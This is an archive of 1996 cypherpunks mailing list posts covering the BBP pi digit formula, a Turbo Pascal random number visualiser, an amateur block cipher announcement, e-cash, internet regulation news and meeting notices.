> |> but the term in parentheses (sorry; they look more like angle brackets)
> |> isn't an integer, so it's not giving you the value of the number in that
> |> ith place.  Instead, it gives you several digits which are in places further
> |> along in pi, with no guarantee that other terms in this sigma won't also
> |> include digits in those places, forcing you to calculate and add up many
> |> terms....
> 
> You certainly have to add up a large number of terms. It is the ease with
> which these terms can be computed that has attracted interest to this and
> similar formulae.
> 
> Think in terms of trying to find the fractional part of 16^N * pi to reasonable
> accuracy, which is what is really meant by "finding the (N+1)'th hexadecmal
> digit" here -- you might always get unlucky and find only that this fractional
> part was between .2fffff and .300001, say. The terms with n >= N are of
> absolute value less than 1, and form a rapidly converging series, so their
> contribution is easy to compute. The term with n < N contribute terms of
> the form 
> 
>    fractional part ( 16^a(i) * b(i) / i )
> 
> where i < 8N, a(i) < N, and the b(i) are small integers. So it is sufficient
> to compute 16^a(i) mod i. If you don't already know, you can find out how to
> do this in time logarithmic in a(i) in, say, Knuth ACP Vol 2.
> 
> This is all explained in detail in the Borwein/Borwein/Plouffe paper, available
> from http://www.cecm.sfu.ca/~pborwein/PAPERS/P123.ps, which should be pretty
> comprehensible even by an amateur.
> 
> Chris Thompson
> Email: cet1@cam.ac.uk
> 
> >From sci.math.pi Fri Jan  5 04:08:06 1996
> From sci.math Wed Dec 20 05:17:20 1995
> Path: panix!bloom-beacon.mit.edu!gatech!psuvax1!news.math.psu.edu!chi-news.cic.net!uwm.edu!lll-winken.llnl.gov!apple.com!apple.com!not-for-mail
> From: rjohnson@apple.com (Robert Johnson)
> Newsgroups: sci.math
> Subject: Re: nth digit of pi calculable?
> Date: 19 Dec 1995 13:01:28 -0800
> Organization: Apple Computer, Inc., Cupertino, California
> Lines: 57
> Message-ID: <4b7978$cj1@apple.com>
> References: <4b2n64$s27@netnews.upenn.edu>
> NNTP-Posting-Host: apple.com
> Status: RO
> X-Status: 
> 
> 
> In article <4b2n64$s27@netnews.upenn.edu>,
> Jim J Moskowitz <jimmosk@red.seas.upenn.edu> wrote:
> >I've seen the recent reports about the discovery of a formula for pi 
> >of the form 
> >       infinity
> >        -----
> >        \        (- n) /   4         2         1         1   \
> >         )     16     (------- - ------- - ------- - -------  )
> >        /              \8 n + 1  8 n + 4   8 n + 5   8 n + 6 / 
> >        -----
> >        n = 0
> >
> >which is said to tell you in a simple manner what the nth digit in the
> >hexadecimal expansion of pi is.  I don't see why.  Yes, the ith term of
> >this series does include 16^-i, which is the ith place in said expansion,
> >but the term in parentheses (sorry; they look more like angle brackets)
> >isn't an integer, so it's not giving you the value of the number in that
> >ith place.  Instead, it gives you several digits which are in places further
> >along in pi, with no guarantee that other terms in this sigma won't also
> >include digits in those places, forcing you to calculate and add up many
> >terms....
> 
> The full article can be found in PostScript form at 
> 
>     http://www.cecm.sfu.ca/personal/pborwein/PAPERS/P123.ps
> 
> and a text announcement can be found at
> 
>     http://www.mathsoft.com/asolve/plouffe/scimath.txt
> 
> Yes indeed, you have to add up many terms.  However, the amount of
> computation to find the n^th digit is on the order of n.  Whereas,
> to compute n digits would require computation on the order of n^2.
> 
> The idea that drastically reduces the work here is that it is very easy
> to compute the n^th hex digit of 1/k.  This is accomplished by raising
> 16 to the n-1^st power modulo k.  Dividing the remainder by k gives the
> hex expansion of 1/k starting at the n^th hex digit.  Raising 16 to the
> n-1^st power modulo k is done by squaring and multiplying based on the
> binary expansion of n-1 (the method of repeated squaring).
> 
> Thus, to get 16^{-k} 4/(8k+1) starting at the nth hex digit,
> compute 4*16^(n-1-k) mod 8k+1.  Divide this remainder by 8k+1.
> For example, take n = 1000000000 and k = 1257894:
> 
>     4*16^998742105 mod 10063153 = 4894450
> 
> and 4894450/10063153 = .7C82F7B089CCA729... (hex)
> 
> It will still entail around billion terms to compute the billionth
> digit of pi, but that's better than computing a quintillion digits.
> 
> Rob Johnson
> Apple Computer, Inc.
> rjohnson@apple.com
> 
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 6 Jan 1996 00:37:35 +0800
To: cypherpunks@toad.com
Subject: Market Earth Wins Another
Message-ID: <2.2.32.19960105111646.008fb73c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


NEW YORK (Reuter) - AT&T Corp. said Thursday that its embryonic online
service AT&T Interchange Online Network would become part of the Internet's
World Wide Web within a year instead of being a proprietary system. 

``The Interchange platform as we know it will phase out over a year or so.
That platform will be dissolved into the World Wide Web,'' Michael Kolowich,
president of AT&T New Media Services told journalists on a conference call. 

AT&T said it would be able to take advantage of the best electronic commerce
and navigation software for the Internet, most of which are not compatible
with Interchange. 

In doing so AT&T is taking a leaf out of Microsoft Corp.'s book which in
December changed tack to open its online service for free to Internet users.
The move may be replicated in other online companies, analysts say.

******************

Now if Microsoft and AT&T can't fight open market information networks, what
chance do the Feds have to impose their proprietary system on the Net?  The
Feds are even worse at marketing than AT&T.

DCF

"If AT&T owned KFC they'd advertize that they are selling 'hot, dead,
chicken'.  No, I'm afraid they'd advertize 'lukewarm, dead, chicken'."  --
Stolen from Jerry Pournelle





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 5 Jan 1996 19:55:46 +0800
To: Rudi Raith <cypherpunks@toad.com
Subject: Indecency Mathematics
Message-ID: <2.2.32.19960105113904.008ea92c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:26 PM 1/4/96 +0100, Rudi Raith wrote:
>2)
>
>I suppose that there is a predicate indecent_p(n), which is true if n
>represents something indecent, false otherwise. (Some implementation
>of such a predicate could be a police officer arresting you upon
>presentation of the number to him, yielding true. :-) ) Such numbers
>may be called "Indecent Numbers", their "posession", "transfer",
>etc. be banned.

Fortunately or unfortunately, "decency" and "indecency" are incapable of
exact mapping to words.  Location, context, tone of voice, year, time of
day, recipient of communication, etc. all affect "indecency."

"That girl is attractive."

"The bitch is in heat."

"Our President -- William Jefferson Blythe Clinton."

"Jesus Christ is the Son of God."

All of these statements are sometimes decent and sometimes
indecent/blasphemous.  It depends purely on a host of factors.  That is the
point of using the "indecency" standard.

Consider the similar problem of defining the crime of Blasphemy:

Christian:
"Jesus Christ, the Messiah is God"

Blasphemy because it claims that a man as God.

Jew:
"The Messiah has not yet come."

Blasphemy because it denies the divinity of Jesus.

We solved this problem in the US by legalizing all such speech.  That is the
only way to handle the similar decency/indecency definition problems.

DCF

"Government is not established for the benefit of the governed." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com
Date: Sat, 6 Jan 1996 07:56:42 +0800
To: Cypherpunks@toad.com
Subject: More Noise Sphere Noise (simple source code)
Message-ID: <199601051236.HAA28251@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain




Ok, no language holy wars.  This was quickie to test out
the Noise Sphere plotting.  It's in Pascal, but it's
understandable.

{ Simple demo of a Noise Sphere in Turbo Pascal         }
{ (If only I had a really awful RNG to test it with...) }

program NoiseSphere;
  uses Graph, Crt;

const
  BGIPath = ''; { where those silly Borland *.BGI drivers are }

var
  GraphMode,
  GraphDriver: Integer;


type
  Polar = record
    r, theta, phi: Real;
  end;

  Cartesian = record
    x,y,z: Real;
  end;

procedure PolarToCartesian(var P: Polar; var C: Cartesian);
begin
  C.x := P.r * Sin(P.phi) * Cos(P.theta);
  C.y := P.r * Sin(P.phi) * Sin(P.theta);
  C.z := P.r * Cos(P.phi);
end;

procedure Plot(var C: Cartesian);
begin
  with C do begin
    PutPixel(100+(Round(100*y)), 200-(Round(120*z)), Yellow);
    PutPixel(320+(Round(100*x)), 200-(Round(120*y)), Red);
    PutPixel(540+(Round(100*x)), 200-(Round(120*z)), Blue);
  end;
  Delay(1);
end;


function ByteToReal(b: Byte): Real;
begin
  ByteToReal := b / 256;
end;

function InitScreen: Integer;
begin
  GraphMode := VGAHi;
  GraphDriver := EGA;
  InitGraph(GraphDriver,GraphMode,BGIPath);
  InitScreen := GraphResult;
end;

var
  n: LongInt;
  X: Array [ 0..2 ] of Real;
  P: Polar;
  C: Cartesian;
begin
  InitScreen;
  Randomize;
  for n := 0 to 2 do X[n] :=
{$ifdef USEDEV}
{$else}
    ByteToReal(Random(256));
{$endif}
  n := 0;
  repeat
    with P do begin
      r := Sqrt(X[(n+2) mod 3]);
      theta := pi * X[(n+1) mod 3];
      phi := 2 * pi * X[n];
    end;
    PolarToCartesian(P,C);
    Plot(C);
    X[n] :=
{$ifdef USEDEV}
{$else}
    ByteToReal(Random(256));
{$endif}
    n := (n + 1) mod 3;
  until KeyPressed;
    ReadKey;
  RestoreCrtMode;
end.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sat, 6 Jan 1996 02:09:27 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Representations of Pi, etc.
Message-ID: <v01530502ad12f513af2c@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:

>In summary, I would be surprised to find that a method for calculating the
>Nth digit of pi works for base N but not for base M (modulo some minor
>efficiency factors related to machine architecture, etc.).
>
>Any pointers to this result would be appreciated.

See Peter Borwein's home page:

   http://www.cecm.sfu.ca:80/personal/pborwein/

under _Calculating Pi and Other matters_.



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 5 Jan 1996 16:20:38 +0800
To: cypherpunks@toad.com
Subject: Re: \"Concryption\"
In-Reply-To: <199601050105.UAA29900@light.lightlink.com>
Message-ID: <Pine.BSD.3.91.960105074625.2355D-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jan 1996 anonymous@freezone.remailer wrote:

> Does anyone understand what this "Concryption" really is? Reading the
> press blurbs, it could be nothing more than simply compressing the
> stream before encrypting it. A patent on that idea would be rather
> awkward.
> 
	thought that myself when I first read it -- did that at least 15 
    years with the standard unix compress --broke compress into a single
    library module, fed itfrom the input buffer and directly fed it to an
    RSA style paired key unit and streamed it out whereever specified
    --yes, it was far more efficient than two programs --and that was on
    my VAXEN (780)! 

	however, I guess they think they have reinvented the world and no 
    one ever tried to patent the process. patents are not worth the paper
    they are printed on in general --I stopped filing in 1975. I was
    supporting ignorant patent lawyers who could not even write the
    claims! That, and feds took away a nuber of patents in the national
    interest, which of course they deny as they scrubbed the rcords
    clean.... 

	so, let's see if he can enforce it!
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Sat, 6 Jan 1996 09:36:39 +0800
To: cypherpunks@toad.com
Subject: Re: Representations of Pi, etc.
Message-ID: <v01510101ad12e25fe289@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) wrote:
>I didn't see this result you mention, but it surprises me. The part about
>how it works in some bases, but not in decimal.
>
>The "hand-waving" (motivational/informal) explanation for why I am
>surprised is that "Nature doesn't care about bipeds with 10 digits vs.
>bipeds, or whatever, with 2 digits or 16 digits." That is, results
>applicable in base 16, hexadecimal, should be easily applicable in base 10.

Since we're talking about digits rather than numbers, I can see why base to
some power of 2 might turn out to be significant. The trivial base 2 or 16
to base 10 conversion isn't useful if you're working with a single digit. A
well, its fruitless to guess without looking at the result. Let me close by
saying that in decimal notation, not a single digit of Klarner's Konstant
is known. Not really relevant, but its as close a chance as I get to
mentioning my research. :-)


Dietrich J. Kappe    | Web Publishing: http://www.redweb.com
Red Planet, L.L.C.   | Chess Space:  http://www.redweb.com/chess
1-800-RED 0 WEB      | MS Access: http://www.redweb.com/cobre
RedPlanet@redweb.com | Comics: http://www.redweb.com/wraithspace






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Sat, 6 Jan 1996 08:52:10 +0800
To: cypherpunks@toad.com
Subject: Ruby Block Cipher Mark 5
Message-ID: <Pine.SUN.3.91.960105090605.14176B-100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The Ruby Block Cipher, Mark 4, had some problems with slow avalanche with a
worst-case input, as well as some really amateurish reference code bugs that
I apologize for.  The good news is that these things have (I hope) all been
corrected in the Ruby Block Cipher, Mark 5.

The biggest change to the algorithm is that the "family key" is no longer
simply added (modulo 2) to the input blocks, but is used in add and multiply
steps to eliminate the old worst case avalanche patterns.

The Ruby Block Cipher is not a general block cipher in that it cannot be used
in Electronic Codebook (ECB) mode.  It is a cryptographic hash function with
a block size of only 64 bits. Of course, 64 bits is too short for a
cryptographic hash function intended for digital signature use, but it is
just fine for a quick block cipher.

This may be a good reference for those folks who want a quick & easy
encryption algorithm that need not withstand nuclear attack but can provide
something better than common weak encryption methods in use in the software
industry.  The small amount of code, fast operation, and lack of the need for
a lengthy key setup time are definite advantages where computing resources
are at a premium.  On the other hand, fast key setup time substantially
reduces the cost of a brute force attack on the key, so use of the full 64
bits of the key is essential.

Your comments and suggestions on this rather strange little cipher are
welcome and encouraged.  I'm particularly interested in any ideas as to how
many rounds (the STRENGTH constant in the source code) are appropriate for
well-balanced security.

Information on the Ruby Block Cipher is available as

ftp://ftp.csn.net/mpj/public/ruby_m5.ps.gz or
ftp://ftp.csn.net/mpj/public/ruby_m5.rtf.gz

and, if you are in the USA or Canada, a reference implementation and a sample
file encryption program with free source code is in

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/mpj/ruby_m5.zip
where the ??????? is revealed in
ftp://ftp.csn.net/mpj/README

ruby_m5.zip is also available on the Colorado Catacombs BBS at 303-772-1062.

I urge caution in using such a new cipher in actual applications, but if you
feel the need to, you might consider asking me if any known weaknesses have
been reported before you do.

Note: this is not a product for sale (it is free and probably worth at least
as much as you pay for it).  It is also not a prepublication (it is THE
publication in electronic form with no paper publication anticpated in the
near future).

                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.net aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | http://www.csn.net/~mpj                 -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|



-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAgUBMO1VgvX0zg8FAL9FAQECzQP/fD9dLLeixfZAtKXM2tDXrGgrashiqEsn
jU9ohnNsou9MMU+PUmNj8RJCRHSXy4HMskV5BhnILUYaSI5ztJjZYvhBcIbBcR8J
ecGl5++iaj4vRAb1vs32Y6LVsQm7hsMvy0byaszOWUKDpn+ZJrFCwMiKgD50ecXW
y+XlpkdOhiA=
=FQec
-----END PGP SIGNATURE-----
Please include my address on followups, since I don't read all mail on this
wonderful (but high volume) list.  Thanks! mpj@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 5 Jan 1996 07:49:25 +0800
To: cypherpunks@toad.com
Subject: FreeBSD user
Message-ID: <199601042215.JAA03077@suburbia.net>
MIME-Version: 1.0
Content-Type: text


I've just had my 3rd Freebsd kernel. Enough is enough.

--Proff

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robbie Gates <gates_r@maths.su.oz.au>
Date: Fri, 5 Jan 1996 07:00:45 +0800
To: Rudi Raith <rra@feilmeier.de>
Subject: Re:
In-Reply-To: <199601041317.OAA04812@aws26.muc.feilmeier.de>
Message-ID: <30EC571A.41C6@maths.su.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


> The decimal representation of any irrational number (e.g. pi, e)
> contains the decimal representation of every natural number
> somewhere. (Proof by diagonalization.)
What you say here isn't quite true.  The number with decimal rep
0.10100100000010000000000000000000000001....
where the number of zero's is going 1!, 2!, 3!, 4!, ...
is transcendatal, and hence irrational, but clearly doesn't contain
the decimal representation of every natural number.

i'm sure the above fact is believed about e, pi & other such
``important transcendentals'' - i can't recall if there is a proof
or how it goes.  diagonalization is used to prove that there are
uncountably many irrationals.

if you want to argue the ludicrosity of trying to ban certain numbers,
just consider the function f(n) = n + 1.  Iterating this function
yields all natural numbers, so the increment operation should clearly
be banned.  I'm not sure how much programming you can do without increment.

 - robbie
-- 
----------------------------------------------------------------------
      robbie gates      | it's not a religion, it's just a technique.
  apprentice algebraist |    it's just a way of making you speak.
    pgp key available   |       - "destination", the church.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Sat, 6 Jan 1996 09:02:11 +0800
Subject: RSA's Art gallery is now on the web
Message-ID: <9600058208.AA820864531@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Are you tired of the clip art you downloaded last week?  Do you
need a new background screen for you PC?  Does your cubicle need something
to give it character?
        Look no further.  Visit the RSA Data Security Art Gallery and
download to your hearts content.  We have such classics as the "Sink 
Clipper" T-shirt image, and our latest "We Hear You" poster by the
famous political cartoonist, Dan Perkins (a.k.a. Tom Tomarrow).  Don't
miss the our rendition of the NSA logo ("We read your mail, so you
don't have too").
        More art will be coming soon.  Feel free to send us your favorite
images, or ideas (webmaven@rsa.com).

                --Bob Baldwin
                  RSA Data Security





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 5 Jan 1996 23:39:44 +0800
To: cypherpunks@toad.com
Subject: ZAP_law
Message-ID: <199601051521.KAA15505@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-5-96. W$Jaw:

   "High Tech Zaps German Privacy Laws. CompuServe Case Shows
   Difficulty of Enforcement."

      The growing popularity of the Internet and other
      multimedia services poses a major challenge to Germany's
      tough data-protection legislation. The personal 
      information that is freely given and used for
      marketing purposes in the U.S. is off limits in Germany.

      The CompuServe case demonstrates just how difficult it
      is becoming for national regulators to control the flow
      of information. This is particularly true in Germany,
      where a raft of legislation is in force designed to
      avoid-any repeat of the Nazi-era abuse of data, as well
      as the dissemination of pornography and extremist
      propaganda. The nation's internal security services are
      already struggling to combat the sophisticated use of
      computers by neo-Nazi groups. Following a recent ban on
      several such organizations, right-wing extremists have
      been sending coded messages of racial hatred to one
      another through a system of computer mailboxes known as
      the Thule network.


   "CompuServe Seeks a High-Tech Answer To Fracas Over Bar on
   Adult Material."

      Industry executives said the move sets a bad precedent
      that could invite still more countries to demand their
      own diverging standards of what is acceptable. Critics
      further maintained that the approach simply won't work.
      In addition, critics voiced concern that CompuServe's
      efforts will lead to on-line services being forced to
      take responsibility for information they didn't create.


   1-5-95, WashPo:

   "Worldwide Net, Worldwide Trouble" [Editorial]

      The borderless quality of the Internet, one of its great
      strengths, can now be seen also as a source of
      unprecedented and unnerving international liability.
      Just as "community standards" were used in Tennessee to
      prosecute two California-based bulletin board operators
      on obscenity charges a few years back, big commercial
      providers like CompuServe or America Online could find
      themselves facing charges based on the very different
      legal systems of a Germany or France or, for that
      matter, an Iran.

   Trio: ZAP_law













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 5 Jan 1996 23:47:57 +0800
To: cypherpunks@toad.com
Subject: ISD_eny
Message-ID: <199601051524.KAA15888@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-5-96. NYP:

   "2 Large Phone Companies Seek Higher Digital Rates. Critics
   See Damage to a Fast Internet Link."

      The proposal has angered people who use the ISDN
      service to work from home. Phil Karn, an engineer at
      Qualcomm, argued that the new tariff would cost him 
      about $100 more a month. He said he was upset by the 
      proposal to lift rates and was anxious to switch to 
      cable service when it became available.

   ISD_eny

---------

   On cable modems: the 12-27 W$J reported on a test at Boston
   College, and provided comparisons with other systems.

   GEY_ser













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Sat, 6 Jan 1996 03:04:31 +0800
To: cypherpunks@toad.com
Subject: Re: Starting an e-cash bank
In-Reply-To: <v02120d1fad11eb9da339@[192.0.2.1]>
Message-ID: <4cjg0c$rm5@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <v02120d1fad11eb9da339@[192.0.2.1]>,
Lucky Green <shamrock@netcom.com> wrote:
>Besides, wherer users get the Ecash from, be it by putting money into their
>account at MT or buying it from you doesn't matter. They still need an
>account with MT.

Huh?  Why?  If I'm an ecash seller, I take a customer's paper money,
withdraw ecash from _my_ MT account, give the ecash to the customer
(_not_ a payment: I just give him the coin -- the pair (n,f(n)^(1/h)))
and the customer is free to use it at will.  It's Digicash's slogan:
the numbers _are_ the money.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sat, 6 Jan 1996 03:11:06 +0800
To: cypherpunks@toad.com
Subject: Re: Representations of Pi, etc.
In-Reply-To: <ad11fe741202100469b4@[205.199.118.202]>
Message-ID: <199601051850.KAA01175@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:

> > [ individual bits of pi ]
>
> I didn't see this result you mention, but it surprises me. The part about
> how it works in some bases, but not in decimal.

It's an open question as to whether there's a version that works
in base 10.  There's a nice summary at
"http://www.mathsoft.com/asolve/plouffe/plouffe.html".

> In summary, I would be surprised to find that a method for calculating the
> Nth digit of pi works for base N but not for base M (modulo some minor
> efficiency factors related to machine architecture, etc.).

It does seem strange, but radix conversion can be much more expensive
than the baseline algorithm.  I vaguely remember hearing that
the billion-digit pi computations done with AGM techniques haven't
dealt with base 10 recently.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 6 Jan 1996 03:39:51 +0800
To: cypherpunks@toad.com
Subject: DCSB: Digital Commerce: Living Room ExIm, Retail Replacement, or Mail-Order Redux?
Message-ID: <v02120d04ad12f8ab0110@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


                 The Digital Commerce Society of Boston
            (Formerly The Boston Society for Digital Commerce)

                               Presents

                             Fred Hapgood

                   Digital Commerce: Living Room ExIm,
                 Retail Replacement, or Mail-Order Redux?


                        Tuesday, February 6, 1995
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Fred says:

>So far Web commerce has largely been a speciality export story.
>(www.activmedia.com says that web commerce is half exports.) This
>reflects the obvious strengths of the medium: webstores are
>globally accessible and can support information resources to any
>depth customers require.
>
>However, the meat and potatoes of the $2 trillion American retail
>market lie not in specialty exports but in geographically
>structured markets built on access to local traffic and
>characterized by low-information transactions.  If web commerce
>has no role to play in commerce on this level, it will end up
>little more than an extension and enhancement of direct mail.
>(Which is of course not to be dismissed entirely: direct mail did
>$55 billion last year.)
>
>My talk will address the compatibility of these segments with the
>web, now and later.


Fred Hapgood has written on internet commerce for _CIO_ and
_Webmaster_ magazines.  He has written on associated subjects for
_Wired_ and _Inc-Technology_.  The February talk will be based on
research for an article on the web and franchising.



This meeting of the Boston Society for Digital Commerce will be held on
Tuesday, January 2, 1995 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have a jacket and tie dress code.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, February 2 , or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 February    Fred Hapgood     Freelance Author
 March       Glenda Barnes    X.9 Electronic Commerce Security Group
 April       Donald Eastlake  CyberCash
 May         Perry Metzger    Security Consultant and Cypherpunk
 June        Dan Shutzer      FSTC
 July        Pete Loshin      Author, "Electronic Commerce"

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO1H9vgyLN8bw6ZVAQGPyAQAkJeE0VtJXMQ58uUss1hvW0Xtf5FBvAM8
3uNGxQIjLT48rkSPRtmqxsx8KLoirdbCdARwbwStewVVvehvUIByYTCGmUWXBxPH
OKhCM/iuEqZ0oZR7RNcTHu2/rduIBdpC53CwyiUmaomj8tAgM5fry9H5h/mjJVu8
aRu36l8isH8=
=+lq2
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 6 Jan 1996 01:46:47 +0800
To: cypherpunks@toad.com
Subject: Internet Gateway for Bletchly Park Trust
Message-ID: <9601051554.AA09438@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


I am trying to setup an Internet gateway for BP Trust. I will either convience
Sun to donate a SparcStation for this purpose, or I will donate one myself.
What I need is a contact in the UK for some ISPs, or a University or somesuch
that would consider hosting their domain/address.

Will anyone having any information that might be of use to me in this endevour
please email me at: pjb@ny.ubs.com and/or pjb@23kgroup.com.

I have just returned from a trip to BP, and there are many new and exciting things going on there.  I will (RSN) post an article re: the current state
of affairs at BP.

Cheers,
	paul 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Sat, 6 Jan 1996 03:27:41 +0800
To: cypherpunks@toad.com
Subject: Re: US cryptographic patents, 1995
Message-ID: <199601051906.LAA13100@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



lull@acm.org (John Lull) said:

> This data was extracted from a free database maintained by the
> EDS Shadow Patent Office at http://www.spo.edo.com/

That's really http://www.spo.eds.com

thad
-- Thaddeus Beier                     thad@hammerhead.com
   Technology Development                   408) 286-3376
   Hammerhead Productions        http://www.got.net/~thad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Leeds <cosmos@sponsor.octet.com>
Date: Sat, 6 Jan 1996 04:36:54 +0800
To: cypherpunks@toad.com
Subject: recent garbage posts
Message-ID: <199601051114.LAA13949@sponsor.octet.com>
MIME-Version: 1.0
Content-Type: text



The user in question has been talked to.

DO NOT mailbomb root or any other account any more, this will be seen
as hostile activities.

We apologize for your inconvenience, but please, the death threats, physical
bomb threats, and other nonsense is not called for.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 6 Jan 1996 05:11:10 +0800
To: "Daniel C. Cotey" <dccotey@alf.uccs.edu>
Subject: Re: FreeBSD
In-Reply-To: <Pine.OSF.3.91.960104205824.21381A-100000@alf>
Message-ID: <Pine.LNX.3.91.960105113702.8586A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> 	I was wondering if anyone else with pine observed wierd behaviour 
> when reading that message. My pine exported the file, started a message, 
> then fired up a shell, at which point I killed it before anything else 
> happened.

I have pine, but the FreeBSD message just showed up as garbage. I deleted 
the message and that was the end of it. How did it execute a shell when 
you read the message? I didn't think pine had those capabilities... I'm 
using version 3.91




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 6 Jan 1996 04:26:04 +0800
To: cypherpunks@toad.com
Subject: Portland Cypherpunks Meeting
Message-ID: <2.2.32.19960105193942.009413c0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here is the final(?) information on the Portland Cypherpunks meeting.

Date:           Jan 20, 1996
Time:           5:23pm (discordian time)
Location:       The Habit Internet Cafe
                2633 S.E. 21st Av., Portland OR 97202
                SE 21st @ Clinton in Portland, OR
                (503)235-5321

